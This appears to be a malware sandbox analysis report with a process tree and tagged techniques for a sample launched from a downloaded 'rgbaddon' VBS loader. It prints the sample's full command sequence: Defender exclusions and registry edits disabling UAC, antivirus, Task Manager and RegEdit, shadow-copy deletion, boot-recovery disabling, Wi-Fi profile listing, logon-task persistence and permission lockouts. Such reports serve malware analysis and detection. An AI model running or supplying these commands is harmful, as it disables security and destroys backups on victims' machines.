PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85
PID 1420 wrote to memory of 428	1420	chrome.exe	85

System policy modification 1 TTPs 1 IoCs

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1"	systemservice92.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 6 IoCs

Hidden Files and Directories

T1564.001

pid	Process
5060	attrib.exe
4124	attrib.exe
1108	attrib.exe
6452	attrib.exe
6340	attrib.exe
3348	attrib.exe

C:\Users\Admin\AppData\Local\Temp\g.exe
"C:\Users\Admin\AppData\Local\Temp\g.exe"
1⤵
PID:5076

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0bd3cc40,0x7ffb0bd3cc4c,0x7ffb0bd3cc58
  2⤵
  PID:3996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1860,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1856 /prefetch:2
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  PID:1332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:8
  2⤵
  PID:428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:2492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:3716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3080,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4480,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4616 /prefetch:8
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4584,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:8
  2⤵
  PID:4432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:8
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4392,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:8
  2⤵
  PID:3864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4252,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5100,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5024 /prefetch:8
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
  2⤵
  PID:1480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5184,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5276 /prefetch:2
  2⤵
  PID:3136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3720,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5220,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:1
  2⤵
  PID:4040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3356,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:3112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5408,i,12508742700434569622,3092161679406166655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5536 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2160

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4056

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\rgbaddon\loader.vbs"
1⤵
PID:4336
- C:\Users\Admin\Downloads\rgbaddon\files\main.exe
  "C:\Users\Admin\Downloads\rgbaddon\files\main.exe" disable
  2⤵
  PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath "C:\\Users\\"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLUA -Value 0' -WindowStyle Hidden -Verb runAs"
    3⤵
    - Access Token Manipulation: Create Process with Token
    PID:1240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath "C:\\Users\\"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLUA -Value 0' -WindowStyle Hidden -Verb runAs"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1600
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\\Users\; Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -Value 0
        5⤵
        UAC bypass
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4492
- C:\Users\Admin\Downloads\rgbaddon\files\main.exe
  "C:\Users\Admin\Downloads\rgbaddon\files\main.exe" files\final1.exe files\final.exe
  2⤵
  PID:4692
- C:\Users\Admin\Downloads\rgbaddon\files\final.exe
  "C:\Users\Admin\Downloads\rgbaddon\files\final.exe"
  2⤵
  - Executes dropped EXE
  PID:2100
- - C:\Users\Admin\Downloads\rgbaddon\files\final.exe
    "C:\Users\Admin\Downloads\rgbaddon\files\final.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops desktop.ini file(s)
    PID:2356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
      4⤵
      PID:2636
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
        5⤵
        Modifies registry key
        
        PID:1260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"
      4⤵
      PID:1576
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:2908
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3164
    - - C:\$Sys-Manager\systemservice92.exe
        
        "C:\$Sys-Manager\systemservice92.exe"
        5⤵
        Executes dropped EXE
        
        PID:4636
      - C:\$Sys-Manager\systemservice92.exe
        
        "C:\$Sys-Manager\systemservice92.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Disables cmd.exe use via registry modification
        Drops file in Drivers directory
        Drops startup file
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        System policy modification
        
        PID:7124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
        7⤵
        
        PID:2180
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
        8⤵
        Modifies registry key
        
        PID:4432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reagentc /disable
        7⤵
        
        PID:2608
        
        C:\Windows\system32\ReAgentc.exe
        
        reagentc /disable
        8⤵
        Drops file in System32 directory
        Drops file in Windows directory
        
        PID:1812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
        7⤵
        
        PID:3304
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        UAC bypass
        Modifies registry key
        
        PID:3584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
        7⤵
        
        PID:3436
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
        8⤵
        Modifies registry key
        
        PID:332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
        7⤵
        
        PID:748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2604
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        8⤵
        UAC bypass
        Modifies registry key
        
        PID:3380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
        7⤵
        
        PID:4652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1260
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:2052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit /set {bootmgr} displaybootmenu No
        7⤵
        
        PID:2916
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {bootmgr} displaybootmenu No
        8⤵
        Modifies boot configuration data using bcdedit
        
        PID:4120
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
        7⤵
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4844
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
        7⤵
        Disables cmd.exe use via registry modification
        Modifies registry key
        
        PID:2820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1348
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        7⤵
        Modifies Windows Defender DisableAntiSpyware settings
        
        PID:5192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
        7⤵
        
        PID:5136
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        8⤵
        Modifies registry key
        
        PID:6884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.exe'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5272
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
        7⤵
        
        PID:5124
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5228
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
        7⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:5240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.bat'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5256
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f
        7⤵
        
        PID:5344
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
        7⤵
        
        PID:5420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:5468
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        
        PID:6600
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f
        7⤵
        
        PID:5484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.py'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo Y | winget list"
        7⤵
        
        PID:5516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
        8⤵
        
        PID:6616
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f
        7⤵
        
        PID:3448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5612
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f
        7⤵
        
        PID:5788
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
        7⤵
        
        PID:5832
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f
        7⤵
        
        PID:5920
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f
        7⤵
        
        PID:5988
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f
        7⤵
        
        PID:6060
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f
        7⤵
        
        PID:6088
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f
        7⤵
        
        PID:6136
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f
        7⤵
        
        PID:3640
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f
        7⤵
        
        PID:6228
        
        C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f
        7⤵
        
        PID:6312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"
        7⤵
        
        PID:7152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im firefox.exe
        8⤵
        Kills process with taskkill
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"
        7⤵
        
        PID:1260
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users" /grant Admin:F
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f"
        7⤵
        
        PID:1416
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2916
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)"
        7⤵
        
        PID:5436
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)"
        7⤵
        
        PID:5916
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)"
        7⤵
        
        PID:5280
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts
        7⤵
        
        PID:5748
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\drivers\etc\hosts
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6452
        
        C:\Windows\SYSTEM32\setx.exe
        
        setx PATH "C:\$Sys-Manager;C:\Users\Admin\AppData\Local\Temp\_MEI46362\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI21002\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"
        7⤵
        
        PID:5696
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"
        7⤵
        
        PID:5216
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f
        8⤵
        Modifies registry key
        
        PID:6028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"
        7⤵
        
        PID:5592
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        8⤵
        Disables RegEdit via registry modification
        Modifies registry key
        
        PID:6092
        
        C:\Windows\SYSTEM32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:5424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
        7⤵
        
        PID:5796
        
        C:\Windows\system32\icacls.exe
        
